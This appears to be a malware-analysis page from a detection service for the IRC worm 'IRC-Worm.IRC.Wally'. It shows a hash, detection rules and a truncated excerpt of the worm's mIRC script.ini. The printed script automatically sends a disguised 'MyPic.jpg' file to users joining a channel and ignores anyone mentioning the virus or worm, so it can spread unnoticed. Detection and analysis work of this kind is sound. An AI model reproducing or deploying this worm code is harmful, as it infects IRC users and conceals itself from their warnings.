Hostile 92% Download

IRC-Worm.IRC.Wally

Known IRC worm malware

Detects mIRC DCC spreading behavior targeting script.iniDetects mIRC worm behavior modifying script.ini to spread via IRC
SHA-256e7488be8d0c640c2767556041a42ccf42c5dad8f8a8958c4c7d2c6686893b863

Evidence

Detects mIRC dcc send command lines 1–20
1[script]
2n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\mirc\download\MyPic.j�g }
3n1=on 1:CONNECT: {
4n2= /join #virus
⋯4 lines
9n7= /msg #vxtrader If ya want a copy join my channels!
10n8= /part #vxtrader
11n9=on 1:TEXT:*walrus*:#:/.ignore $nick
12n10=on 1:TEXT:*walrus*:?:/.ignore $nick
13n11=on 1:TEXT:*wally*:#:/.ignore $nick
14n12=on 1:TEXT:*wally*:?:/.ignore $nick
15n13=on 1:TEXT:*script.ini*:#:/.ignore $nick
16n14=on 1:TEXT:*script.ini*:?:/.ignore $nick
17n15=on 1:TEXT:*virus*:#:/.ignore $nick
18n16=on 1:TEXT:*virus*:?:/.ignore $nick
19n17=on 1:TEXT:*worm*:#:/.ignore $nick
20n18=on 1 …

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.